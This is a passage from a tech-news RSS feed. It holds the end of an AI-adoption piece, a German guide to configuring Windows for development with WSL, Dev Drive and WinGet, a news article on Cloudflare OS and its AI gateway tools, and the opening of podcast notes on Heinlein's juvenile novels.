<p class="wp-block-paragraph">Employees are more likely to embrace change when they understand how technology helps them be more effective. They need practical experience, clear expectations and opportunities to learn. AI introduces new ways of working, and organizations need to prepare employees for that shift.</p>



<p class="wp-block-paragraph">In our own organization, we encouraged every employee to establish an AI-related learning goal because familiarity with emerging technologies is becoming part of every role. Some goals were simple. Some were more advanced. The important point was creating a culture where people continue to learn and understand how AI applies to their work versus forcing AI activity broadly all at once.</p>



<p class="wp-block-paragraph">As AI becomes more embedded in enterprise operations, organizations with strong foundations in governance, process discipline and workforce readiness will be better positioned to capture long-term value.</p>



<p class="wp-block-paragraph">The companies realizing the greatest value from AI are investing in technology while also strengthening the operating models, information management practices and employee capabilities that support adoption. Sustainable transformation requires attention to people, processes, data and technology.</p>



<p class="wp-block-paragraph">Preparing people, building trust and creating clear operating models remain central to any successful AI strategy.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Windows zur Entwicklungsumgebung wird]]></title>
<description><![CDATA[Windows-Maschine und Developer-„Flow“ gehen gut zusammen – ein paar Kniffe vorausgesetzt.Dragon Images | shutterstock.com



Als Umgebung für Entwickler hat Microsoft Windows in den letzten Jahren einen Sprung nach vorne gemacht. Mit dem Windows-Subsystem für Linux (WSL) ist es nahtlos möglich, m...]]></description>
<link>https://tsecurity.de/de/3709505/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709505/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 06:32:07 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Dragon-Images_shutterstock_401334922_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Dev Coding Speed 16z9" class="wp-image-4202220" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Windows-Maschine und Developer-„Flow“ gehen gut zusammen – ein paar Kniffe vorausgesetzt.</figcaption></figure><p class="imageCredit">Dragon Images | shutterstock.com</p></div>



<p class="wp-block-paragraph">Als Umgebung für Entwickler hat Microsoft Windows in den letzten Jahren einen Sprung nach vorne gemacht. Mit dem Windows-Subsystem für Linux (<a href="https://www.computerwoche.de/article/2856740/windows-10-subsystem-fuer-linux-wsl-einrichten.html" target="_blank">WSL</a>) ist es nahtlos möglich, mit Linux unter Windows zu arbeiten – ohne den Mehraufwand, den eine virtuelle Maschine (<a href="https://www.computerwoche.de/article/2814705/was-sind-virtual-machines.html" target="_blank">VM</a>) mit sich bringt. Zudem sind sämtliche gängigen Dev-Tools als native Windows-Versionen verfügbar – und Microsoft hat eine ganze Reihe entsprechender Funktionen auch direkt in sein Betriebssystem <a href="https://blogs.windows.com/windowsdeveloper/2026/06/02/build-2026-furthering-windows-as-the-trusted-platform-for-development/">integriert</a>.</p>



<p class="wp-block-paragraph">Für Developer, die besonders schnell mit einer Windows-Maschine entwickeln wollen, hat Microsoft mit der „<a href="https://github.com/microsoft/WindowsDeveloperConfig/" target="_blank" rel="noreferrer noopener">Windows Developer Config</a>“ sogar so etwas wie eine Schnellspur geschaffen: Diese Sammlung von Powershell-Skripten fungiert als eine Art „Starter Kit“ und unterstützt dabei, Windows-Systeme möglichst schnell und komfortabel als Entwicklungsumgebung einzurichten. </p>



<p class="wp-block-paragraph">Wenn Sie hingegen – wie <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" target="_blank">die meisten Entwickler</a> – Wert darauflegen, die Kontrolle zu behalten und Ihr Dev-System selbst einzurichten und zu konfigurieren, ist ein bisschen Vorarbeit nötig. Der Aufwand selbst ist dabei überschaubar, die konkreten Schritte sind jedoch erfolgsentscheidend (und nicht unbedingt offensichtlich).   </p>



<p class="wp-block-paragraph"><strong>Hinweis:</strong> Um die nachfolgenden Maßnahmen umzusetzen, sollten Sie auf Ihrem System über Administratorrechte verfügen.</p>



<h2 class="wp-block-heading">1. WSL installieren</h2>



<p class="wp-block-paragraph">WSL stellt Windows-Benutzern ein vollständiges Linux-System über die Kommandozeile zur Verfügung – was weniger Overhead verursacht als eine VM. Da Software weltweit vor allem unter <a href="https://www.computerwoche.de/article/3614492/die-wichtigsten-linux-befehle-fur-einsteiger.html" target="_blank">Linux</a>– oder Unix-ähnlichen Systemen wie macOS entwickelt wird, ist das ein echter Vorteil. </p>



<p class="wp-block-paragraph">Um WSL zu installieren, öffnen Sie ein Konsolenfenster mit Administratorrechten und nutzen den Befehl:</p>



<pre class="wp-block-code"><code><code>wsl --install</code></code></pre>



<p class="wp-block-paragraph">Die Installation kann einige Zeit in Anspruch nehmen, da das System sowohl die Kernkomponenten für WSL als auch – damit zusammenhängend – eine Linux-Distribution herunterladen muss. </p>



<p class="wp-block-paragraph">Die Standard-Linux-Distribution in WSL ist <strong>Ubuntu 26.04 LTS</strong>. Diese erfüllt als Default-Lösung die meisten Anforderungen, die Entwickler an eine Linux-Distribution stellen. Es stehen jedoch auch andere Distributionen zur Verfügung – und es kommen regelmäßig neue hinzu. Sie könnten sogar Ihre eigene, <a href="https://learn.microsoft.com/de-de/windows/wsl/build-custom-distro">benutzerdefinierte Linux-Distribution für WSL</a> kreieren.</p>



<p class="wp-block-paragraph">Sobald WSL installiert ist, können Sie über den Befehl wsl –list –online alle verfügbaren Distributionen anzeigen. Um eine davon zu installieren, nutzen Sie den Befehl <code>wsl --install </code>. Die meisten verfügbaren Optionen sind auf unterschiedliche Vorlieben oder spezifische Anforderungen zugeschnitten. Wenn Sie beispielsweise an einem Projekt arbeiten, das Debian als Grundlage voraussetzt, sollten Sie das auch installieren.</p>



<p class="wp-block-paragraph">WSL-Distributionen werden standardmäßig im <code>AppData</code>-Verzeichnis abgelegt – genauer gesagt unter <code>AppData\Local\Packages\</code>. Wenn Sie die Dateien in ein anderes Verzeichnis oder auf ein anderes Laufwerk verschieben möchten, können Sie das mit dem Befehl <code>wsl --manage  --move </code> bewerkstelligen.</p>



<p class="wp-block-paragraph">Darüber hinaus hat Microsoft Ende Juni 2026 mit <a href="https://devblogs.microsoft.com/commandline/wsl-container-is-now-available-for-public-preview/" target="_blank" rel="noreferrer noopener">WSL-Container</a> (derzeit in der Public Preview) eine wichtige neue Funktion für WSL vorgestellt. Diese ermöglicht es, Linux-Container nativ unter Windows auszuführen.</p>



<h2 class="wp-block-heading">2. Dev-Drive-Laufwerk konfigurieren</h2>



<p class="wp-block-paragraph">Um Projekte zu speichern, nutzen die meisten Windows-Benutzer standardmäßig ein Verzeichnis auf einem NTFS-Volume – entweder im eigenen Benutzerprofil oder über einen anderen Pfad. Das ist als Default-Option keine schlechte Wahl. Allerdings gibt es bessere Alternativen.</p>



<p class="wp-block-paragraph">Zum Beispiel „<a href="https://learn.microsoft.com/de-de/windows/dev-drive/" target="_blank" rel="noreferrer noopener">Dev Drive</a>“, ein neuer Laufwerkstyp unter Windows. Dieser nutzt statt NTFS das neuere Dateisystem <a href="https://learn.microsoft.com/de-de/windows-server/storage/refs/refs-overview" target="_blank" rel="noreferrer noopener">ReFS</a> („Resilient File System“). Dieses wurde ursprünglich für Windows Server entwickelt und bietet Funktionen, die darauf ausgelegt sind, Softwareentwicklungs-Workloads besser zu bewältigen. Dazu gehören:  </p>



<ul class="wp-block-list">
<li><strong>Copy-on-Write: </strong>Projektverzeichnisse können Tausende von Dateien und Dutzende von Unterverzeichnissen enthalten. Kopien von Projekten dieser Art anzufertigen, lässt sich mit ReFS deutlich schneller bewältigen, da das Dateisystem Kopien von Daten erst dann erstellt, wenn diese auch <em>geändert</em> werden. Reine Kopien sind hingegen Links, die auf die Originale verweisen.</li>



<li><strong>Antivirus-Komfort:</strong> Über einen Dev Drive lassen sich die standardmäßigen Beeinträchtigungen durch die nativen Antivirus-Tools von Windows minimieren. Dieses Feature erlaubt es, Entwicklerverzeichnisse manuell von Scan-Vorgängen zu exkludieren.</li>



<li><strong>Virtuelle Festplatte oder Partition:</strong> Dev Drives können als virtuelle Festplattendatei eingerichtet oder direkt auf einer formatierten Partition genutzt werden. Ersteres ist flexibler (unter anderem lässt sich die Größe leichter anpassen), Letzteres möglicherweise performanter.</li>
</ul>



<p class="wp-block-paragraph">Zwei Dinge sollten Sie im Zusammenhang mit Dev Drives unbedingt beachten:</p>



<ol class="wp-block-list">
<li><strong>Dev Drives sind für Projekte gedacht, nicht für Tools:</strong> Dort legen Sie Ihre Projekt-Repositories, Build-Artefakte und zwischengespeicherte Dateien ab. Language Runtimes, <a href="https://www.computerwoche.de/article/4152349/so-wird-ki-zum-compiler.html" target="_blank">Compiler</a> oder anderen Toolchain-Utlities sollten hingegen auf regulären NTFS-Volumes gespeichert werden.</li>



<li><strong>Low-Level-Tools funktionieren unter Umständen nicht wie beabsichtigt:</strong> Dateisystem-Utilities auf Expertenniveau, die Informationen direkt aus den Dateiinformationen auslesen, verhalten sich im Zusammenspiel mit ReFS-Volumes möglicherweise nicht wie vorgesehen. So ist etwa das Speicherplatz-Management-Tool <a href="https://wize-tree.com/" target="_blank" rel="noreferrer noopener">WizTree</a> unter ReFS extrem langsam.</li>
</ol>



<h2 class="wp-block-heading">3. WinGet nutzen</h2>



<p class="wp-block-paragraph">Microsoft hat Windows inzwischen auch mit einem offiziellen Package-Management-System ausgestattet – WinGet. Dieses installiert jede Art von <a href="https://www.computerwoche.de/article/2824356/26-softwareperlen-fuer-windows-pcs.html" target="_blank">Windows-Applikation</a> und bietet zudem ein vollständiges Befehlszeilen-Interface für Interaktion und Automatisierung.    </p>



<p class="wp-block-paragraph">WinGet wird vom Windows-Software-Ökosystem umfassend unterstützt – die Wahrscheinlichkeit ist also groß, dass es für jedes Windows-Programm, das Sie benötigen, ein WinGet-Paket gibt (dazu gleich mehr).</p>



<p class="wp-block-paragraph">Um im WinGet-Repository nach einem Paket zu suchen, nutzen Sie diesen Befehl (die Anführungszeichen sind erforderlich, wenn der Name des gesuchten Pakets Leerzeichen enthält – etwa Adobe Acrobat Reader):</p>



<pre class="wp-block-code"><code><code>winget search "Thing to search for"</code></code></pre>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/image_481.png" alt="WinGet search output" class="wp-image-4196911" width="978" height="205" sizes="auto, (max-width: 978px) 100vw, 978px"><figcaption class="wp-element-caption">Der Output von WinGet bei der Suche nach dem Begriff „Acrobat“. Die „ID“-Spalte gibt den Namen aus, der mit dem Winget-Installationsbefehl zu verwenden ist.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">Das WinGet-Package zu installieren, geht denkbar simpel von der Hand – und zwar mit:</p>



<pre class="wp-block-code"><code><code>winget install </code></code></pre>



<p class="wp-block-paragraph">Dabei meint <code></code> die ID des zu installierenden Pakets – nicht bloß seinen Namen. Im vorgenannten Beispiel (Adobe Acrobat Reader) würden Sie also folgenden Befehl nutzen, um dieses zu installieren:</p>



<pre class="wp-block-code"><code><code>winget install Adobe.Acrobat.Reader.64-bit</code></code></pre>



<p class="wp-block-paragraph">Falls Sie eine ansprechende grafische Benutzeroberfläche suchen, empfiehlt sich ein Blick auf <a href="https://devolutions.net/unigetui/" target="_blank" rel="noreferrer noopener">UniGetUI</a>. Dieses Tool verwaltet Packages aus verschiedenen Quellen – etwa WinGet, Scoop, Chocolatey, npm, pip oder Cargo, um nur einige zu nennen.</p>



<h2 class="wp-block-heading">4. PowerShell für Skripte konfigurieren</h2>



<p class="wp-block-paragraph">Dieser Schritt ist lediglich einmal pro System zu absolvieren, kann jedoch die <a href="https://www.computerwoche.de/article/2834060/10-wege-zur-besseren-developer-experience.html" target="_blank">Entwicklererfahrung</a> von Windows gewaltig steigern: PowerShell sollte entsprechend konfiguriert werden, damit lokale Skripte ausgeführt werden können.   </p>



<p class="wp-block-paragraph">Um das zu bewerkstelligen, starten Sie PowerShell als Admin und nutzen folgendes Kommando:</p>



<pre class="wp-block-code"><code>set-executionpolicy remotesigned</code></pre>



<p class="wp-block-paragraph">Zwar verlangt Windows weiterhin, dass alle PowerShell-Skripte, die Sie aus dem Internet herunterladen, signiert sind – das ist jedoch im Grunde ein Edge Case. Alle lokal erstellten Skripte funktionieren nach dieser Maßnahme ohne Weiteres.</p>



<h2 class="wp-block-heading">5. Weitere Dev-Tools installieren</h2>



<p class="wp-block-paragraph">Wie bereits erwähnt, bietet WinGet schnellen Zugriff auf alle gängigen Tools, die ein entwicklungsorientiertes Windows-System benötigt. Nachfolgend haben wir eine kleine Übersicht der wichtigsten Dev-Tools für Windows inklusive deren WinGet-IDs zusammengestellt, um Ihnen die Installation zu erleichtern.</p>



<ul class="wp-block-list">
<li><strong>Git (</strong><code>Git.Git</code><strong>):</strong> Die Windows-Version des populären Versionskontrollsystems ist im Wesentlichen identisch mit der auf anderen Plattformen.</li>



<li><strong>Visual Studio BuildTools 2022 (</strong><code>Microsoft.VisualStudio.2022.BuildTools</code><strong>):</strong> Dieses minimale CLI-Tooling ist erforderlich, um das C/C++-Kompilierungssystem von Visual Studio zu nutzen.</li>



<li><strong>CMake (</strong><code>Kitware.Cmake</code><strong>):</strong> Die plattformübergreifende Build-Lösung wird häufig für größere oder komplexere Projekte benötigt, die C/C++ nutzen.</li>
</ul>



<p class="wp-block-paragraph">Dabei ist zu beachten, dass die standardmäßige BuildTools-Installation in der Regel nicht über die Tools verfügt, die für minimale C/C++-Build-Prozesse erforderlich sind. Das beheben Sie mit folgendem Befehl:</p>



<pre class="wp-block-code"><code>winget install -e --id Microsoft.VisualStudio.2022.BuildTools --force --override "--passive --wait --add Microsoft.VisualStudio.Workload.VCTools;includeRecommended"</code></pre>



<p class="wp-block-paragraph">Alle gängigen Editoren sind ebenfalls als native Windows-Apps über WinGet verfügbar – etwa:</p>



<ul class="wp-block-list">
<li><strong><a href="https://www.computerwoche.de/article/4199279/visual-studio-code-hat-ein-ki-problem.html" target="_blank">Microsoft Visual Studio Code</a></strong> (<code>Microsoft.VisualStudioCode</code>),</li>



<li><strong>GNU Emacs</strong> (<code>GNU.Emacs</code>), oder</li>



<li><strong>Neovim</strong> (<code>Neovim.Neovim</code>).</li>
</ul>



<p class="wp-block-paragraph">Für die Softwareentwicklung unter Windows optional, aber durchaus nützlich, sind außerdem folgende Werkzeuge:</p>



<ul class="wp-block-list">
<li><strong>CoreUtils for Windows (</strong><code>Microsoft.Coreutils</code><strong>):</strong> Ein von Microsoft gepflegtes Open-Source-Projekt, das <a href="https://github.com/microsoft/coreutils">Dutzende von Linux-Befehlszeilen-Dienstprogrammen</a> auf Windows bringt, beispielsweise cp, grep, find und ls.</li>



<li><strong>MSYS2 (</strong><code>MSYS2.MSYS2</code><strong>):</strong> Eine Tool-Sammlung, um Windows-Binärdateien mit dem GCC-Compiler zu erstellen. Diese bildet im Grunde eine Alternative zum Visual-Studio-Build-Stack auf Basis der <a href="https://cygwin.com/" target="_blank" rel="noreferrer noopener">Cygwin</a>-Umgebung.</li>



<li><strong>LLVM (</strong><code>LLVM.LLVM</code><strong>):</strong> Auf diesem Compiler-Framework basieren Clang, Rust, Swift und viele andere Projekte. Wenn Sie <a href="https://www.computerwoche.de/article/2826586/was-ist-llvm.html" target="_blank">LLVM</a> als Abhängigkeit verwenden, müssen Sie die spezifische Version installieren, die Ihr Projekt erfordert.</li>



<li><strong>Docker Desktop (</strong><code>XP8CBJ40XLBWKX</code><strong>):</strong> Die Windows-native Version der Docker-Desktop-App.</li>



<li><strong>Microsoft PowerToys (</strong><code>Microsoft.PowerToys</code><strong>):</strong> Diese Sammlung besteht aus über 30 Utilities, die es erheblich vereinfachen, <a href="https://www.computerwoche.de/article/3824755/microsoft-powertoys-ein-leitfaden.html" target="_blank">Windows anzupassen</a>. Dazu gehören unter anderem ein <a href="https://learn.microsoft.com/de-de/windows/powertoys/hosts-file-editor" target="_blank" rel="noreferrer noopener">Hosts-File-Editor</a>, ein <a href="https://learn.microsoft.com/de-de/windows/powertoys/file-locksmith" target="_blank" rel="noreferrer noopener">Unlocking-Tool für Dateien</a> (praktisch, um festzustellen, welche Prozesse eine bestimmte Datei sperren) sowie ein <a href="https://learn.microsoft.com/de-de/windows/powertoys/text-extractor" target="_blank" rel="noreferrer noopener">Werkzeug, um Text zu extrahieren</a> (praktisch, um Text von beliebigen Stellen auszulesen, einschließlich Bildschirmbereichen, die nicht mit dem Cursor markiert werden können).</li>
</ul>



<p class="wp-block-paragraph">(fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist </strong><a href="https://www.infoworld.com/article/4196853/how-to-make-windows-a-proper-development-environment.html" target="_blank"><strong>im Original</strong></a><strong> bei unserer Schwesterpublikation Infoworld.com erschienen.</strong></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare wants to provide the operating system for the AI-first enterprise]]></title>
<description><![CDATA[Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.



The company this week announced Cloudflare OS, which connects AI agents, enterprise data and context, internal systems, and ...]]></description>
<link>https://tsecurity.de/de/3709405/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709405/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 03:42:40 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional operating systems (OS) were built to manage hardware, files, apps, and users on a device, but Cloudflare says the agentic AI era requires a whole new format.</p>



<p class="wp-block-paragraph">The company this week announced <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-os-is-the-first-ai-workspace-built-around-how-companies-actually-work/" target="_blank" rel="noreferrer noopener">Cloudflare OS</a>, which connects AI agents, enterprise data and context, internal systems, and workflows together in one secure workspace. It is open source and browser-based, sparing companies the need to build all-new infrastructure.</p>



<p class="wp-block-paragraph">The OS is launching alongside several other new security, identity, spending, and user insight tools that Cloudflare has built for the <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html" target="_blank">AI-based workplace</a>.</p>



<p class="wp-block-paragraph">“Cloudflare OS isn’t a traditional desktop OS,” said <a href="https://www.linkedin.com/in/ritakozlov/" target="_blank" rel="noreferrer noopener">Rita Kozlov</a>, VP of product at Cloudflare. “It reimagines the workplace computing environment for AI.”</p>



<h2 class="wp-block-heading">Open source OS runs in a browser</h2>



<p class="wp-block-paragraph">Cloudflare OS serves as a secure, AI-equipped workspace that is plugged into internal company systems. Available now through Cloudflare’s open source repository, it is accessible directly in a browser, and runs inside an enterprise’s Cloudflare account.</p>



<p class="wp-block-paragraph">“It is a browser-based workspace that begins with a conversation,” Kozlov explained. Users can ask an agent to research, create slides, spreadsheets, and documents, build full-stack apps, or automate workflows without the need for a terminal. Those outputs are then shareable, but kept in isolated databases with access controls.</p>



<p class="wp-block-paragraph">Enterprises will soon be able to access the OS directly through Cloudflare or via a “select group” of partners that will build tailored offerings on Cloudflare’s architecture, the company says. Because it is open source, organizational processes, internal system connections, and context aren’t locked into a vendor product or AI model provider. Customers can use whatever models they choose.</p>



<p class="wp-block-paragraph">Cloudflare OS is built on Cloudflare Workers, <a href="https://www.infoworld.com/article/4149869/cloudflare-launches-dynamic-workers-for-ai-agent-execution.html" target="_blank">Dynamic Workers</a>, Durable Objects, and Access, the company’s zero trust network access (ZTNA) tool that verifies every user and request. Agents start with zero permissions by default and are only granted access to tools required for a specific task. Organizations configure their own Access policies, models, branding, skills, and integrations, Kozlov explained.</p>



<p class="wp-block-paragraph">Governed connectors known as gatekeepers give admins control over what AI can see, what it can change, and when the system needs human sign-off. They can also control budgets, set rate limits, and delegate tasks to different models.</p>



<p class="wp-block-paragraph">“Because <a href="https://www.infoworld.com/article/4165857/are-we-ready-to-give-ai-agents-the-keys-to-the-cloud-cloudflare-thinks-so.html" target="_blank">agents act on people’s behalf</a> and produce work others can access and modify, they require a new security model,” Kozlov said. Thus, Cloudflare OS tracks the resources an agent requires so the right access controls follow its work when it is shared.</p>



<p class="wp-block-paragraph">Cloudflare initially built the OS for internal use, and employees “across every team” use it daily. Kozlov estimated that, over the last 30 days, internal users have used it to create more than 4,000 apps, automations, and tools. Over that same period, she claimed, the company’s sales team saved an estimated 10,000 hours by automating previously manual tasks like territory planning and proposal creation.</p>



<p class="wp-block-paragraph">“We open sourced Cloudflare OS so any organization can build ‘Your Company OS,’” Kozlov said. Open source is critical because “you cannot put your company into software you do not own. Organizations need to be able to inspect the platform, customize it, connect their own systems, and make it their own,” she explained.</p>



<h2 class="wp-block-heading">A more cohesive bundle</h2>



<p class="wp-block-paragraph">Cloudflare deserves credit for packaging Cloudflare OS as an operating system, noted tech analyst <a href="https://ca.linkedin.com/in/carmi" target="_blank" rel="noreferrer noopener">Carmi Levy</a>.</p>



<p class="wp-block-paragraph">“This very much is not Windows, macOS, or Linux, and it isn’t an operating system by its common definition,” he said. “But Cloudflare’s use of this terminology implies familiarity to enterprise IT buyers.”</p>



<p class="wp-block-paragraph">This makes for an easier discussion as enterprises struggle to understand how to best incorporate AI-related platforms and workflows into infrastructure that wasn’t initially designed for it.</p>



<p class="wp-block-paragraph">Microsoft has marketed the combination of its Azure, Entra, Fabric, Windows, and Microsoft 365 offerings as an operating system of sorts, but hasn’t pulled all the pieces into a common brand, Levy said. And Google’s Gemini, Workspace, Vertex AI, and Cloud Run are “circling similar territory.”</p>



<p class="wp-block-paragraph">But, he noted, Cloudflare OS is “more cohesively bundled” and infrastructure-focused, offering a single pane of glass platform for buyers worried about stitching together otherwise disparate AI-aware networking pieces. The company recognizes that AI introduces new architectural realities such as inference and model routing “over and above” traditional OS core competencies.</p>



<p class="wp-block-paragraph">“While competing offerings generally leave the infrastructure heavy lifting to enterprise decision-makers, Cloudflare is marketing itself as a single-source vendor, which potentially frees IT planners from having to integrate all the AI pieces on their own,” Levy said.</p>



<p class="wp-block-paragraph">An infrastructure-first, application-agnostic approach means Cloudflare OS can coexist with whatever AI applications already exist in an enterprise, he said. It will “play nice” with OpenAI, Anthropic, Google, Microsoft, Meta, or open source layers, allowing employees to begin working in familiar workflows after sign-in.</p>



<p class="wp-block-paragraph">“Its open-source architecture also minimizes the potential for vendor lock-in as enterprises gradually figure out how to evolve their stacks to align with new AI-era realities,” Levy said.</p>



<h2 class="wp-block-heading">Managing identities and budgets for both humans and AI</h2>



<p class="wp-block-paragraph">As AI agents emerge across the enterprise, tracking their use can be challenging, causing problems from both a security and a spend standpoint. Along with Cloudflare OS, the company has launched a way to address this issue with its new <a href="https://www.cloudflare.com/press/press-releases/2026/cloudflare-gives-companies-full-visibility-to-audit-and-analyze-ai-use/" target="_blank" rel="noreferrer noopener">Identity-Aware AI Gateway</a>, now in beta.</p>



<p class="wp-block-paragraph">Also integrated with Access, the offering gives admins visibility into what users (both human and AI) are requesting from AI models. It allows security teams to set up custom domains in front of their gateways and replace shared API keys by integrating with their identity provider, like Okta or Entra, and ZTNA infrastructure, Cloudflare explained.</p>



<p class="wp-block-paragraph">Every request is tied to Access-verified identities, and enterprises can filter each user’s logs, analytics, and spend. IT teams can track redundancies, limit usage rates, and apply filters that strip out employee names, passwords, and other sensitive data before requests go to outside model providers.</p>



<p class="wp-block-paragraph">A companion feature, AI Spend, tracks every user’s behavior over time to create a baseline of normal AI usage. When spending deviates from that pattern, the system alerts the IT team.</p>



<p class="wp-block-paragraph">A new tab, User Insights, tracks cost and identifies over-spend caused by activities such as low cache-hit rates or oversized context windows. The capability scores sessions and compares them against account history using a 95th percentile session cost over the previous 30 days, Cloudflare product managers <a href="https://blog.cloudflare.com/author/ming-lu/" target="_blank" rel="noreferrer noopener">Ming Lu</a>, <a href="https://blog.cloudflare.com/author/kenny/" target="_blank" rel="noreferrer noopener">Kenny Johnson</a>, and <a href="https://blog.cloudflare.com/author/ayush/" target="_blank" rel="noreferrer noopener">Ayush Kumar</a> explain in a <a href="https://blog.cloudflare.com/identity-aware-ai-gateway/" target="_blank" rel="noreferrer noopener">blog post</a>. Anything above 2x an account’s 95th percentile is a “strong candidate for anomalous behavior.”</p>



<p class="wp-block-paragraph">For instance, one Cloudflare customer had an employee who left a rogue AI session running, generating a $30K bill. “User Insights helped them identify the problem and shut off access before the problem was further exacerbated,” Kozlov said.</p>



<p class="wp-block-paragraph">Cloudflare is also building prompt classification functionality that sorts requests into categories such as coding or writing. This can help enterprises understand what AI is being used for.</p>



<p class="wp-block-paragraph">“Once business traffic is separated from everything else, personal use becomes visible,” the project managers explained. “From the outside, someone running a side hustle on company time and someone quietly moving data out through a model look the same. Telling them apart is central to catching insider risk.”</p>



<h2 class="wp-block-heading">Looking at the bigger picture</h2>



<p class="wp-block-paragraph">Identity-Aware AI Gateway and AI Spend address the visibility problem that has dogged so many recent AI deployments where enterprises failed to monitor usage, Levy noted. Projects “crashed and burned” as users unwittingly blew through token allocations.</p>



<p class="wp-block-paragraph">These platforms provide single-point visibility into what is being used, how it’s being used, and where the potential lies for raising the productivity bar, he said. They overlay with existing models; in doing so, they enhance security with more precise control over resource allocations, and via automated anonymization protocols that prevent inadvertent sharing of sensitive data.</p>



<p class="wp-block-paragraph">Ultimately, he said, vendors who free IT from having to independently assemble the pieces of their own AI implementations, and who assist them with answers to AI-specific questions, “will gain advantage over vendors that aren’t looking at the bigger picture.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4206332/cloudflare-wants-to-provide-the-operating-system-for-the-ai-first-enterprise.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4700: Robert A. Heinlein: The Juveniles]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.
Heinlein wrote a series of books under contract to Scribners that were aumed at younger readers, pre-teen and teen. Today we would call them Young Adult, but back then they were called Juveniles. But even an adult reader can enjoy many of these boo...]]></description>
<link>https://tsecurity.de/de/3709394/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709394/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 03:42:19 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>
<p>Heinlein wrote a series of books under contract to Scribners that were aumed at younger readers, pre-teen and teen. Today we would call them Young Adult, but back then they were called Juveniles. But even an adult reader can enjoy many of these books. Because they were aimed at younger readers, he could not always be as explicit as he might have liked, but if you pay attention you just might noticed he slipped in something subversive.</p>

<h1>Heinlein: The Juveniles</h1>
						
<p>As a boy I read voraciously. I remember my mother organizing weekly trips to the town library, where I would load up on books, and I quickly became focused on Science Fiction, along with the usual stuff kids read, like the Hardy Boys, Tom Swift, and the Walter Farley horse books. But the idea of going into space grabbed me very early. And one of the first authors I read was Heinlein. He had taken a leave from publishing during World War II, when he was doing research at the Philadelphia Navy Yard. But when the war was over, he set out to move beyond the “pulps” and expand the market for his stories. And one big market for him was what were called “juveniles” at the time, and would today be called “Young Adult”. I was reading adult fiction by the time I was 11 or 12, but before that (and even after that, in fact) I read these Heinlein novels with great relish.</p>

<p>Heinlein’s target audience for these novels was teenage boys. He did a few stories aimed at girls, but mostly he wrote for boys. And these were mostly “coming of age” stories where the teenage protagonist has adventures, and as a result grows and develops. They are very loosely related via some internal references, but should really be thought of as stand-alone stories. They also in some cases have references to his other stories, including the Future history stories. He wrote 13 of these novels, one per year, from 1947 to 1959. The series was published by Scribners until the last one was rejected by them. Heinlein then published it with a different publisher, and stopped writing these novels altogether in favor of more adult fiction. The novels roughly form a progression telling the story of space exploration. It starts with a trip to the Moon, then Venus, Mars, Jupiter’s moon, and so on until we reach the Lesser Magellanic Cloud.</p>

<ul>
<li><em><a href="https://en.wikipedia.org/wiki/Rocket_Ship_Galileo" data-type="link" data-id="https://en.wikipedia.org/wiki/Rocket_Ship_Galileo" target="_blank" rel="noreferrer noopener">Rocket Ship Galileo (1947)</a></em> – While readable, this initial effort was not up to Heinlein’s later standards. The plot concerns three teenagers who assist an uncle to build a rocket ship and go to the Moon. When they get there they discover Nazis have already arrived. The Nazis try to kill the group, but they succeed in turning the tables, stealing the Nazi ship, and returning to Earth as heroes. This novel became the basis (loosely) for the movie <em><a href="https://en.wikipedia.org/wiki/Destination_Moon_(film)" data-type="link" data-id="https://en.wikipedia.org/wiki/Destination_Moon_(film)" target="_blank" rel="noreferrer noopener">Destination Moon (1950)</a></em>, and I personally would consider the movie to be superior to the novel. It is also worth noting that the theory brought up in <em>Blowups Happen</em> reappears in this novel. They find evidence of an ancient Lunar civilization that was destroyed, and theorize that the craters on the moon were caused by the explosion of nuclear reactors that caused the extinction of the civilization.</li>

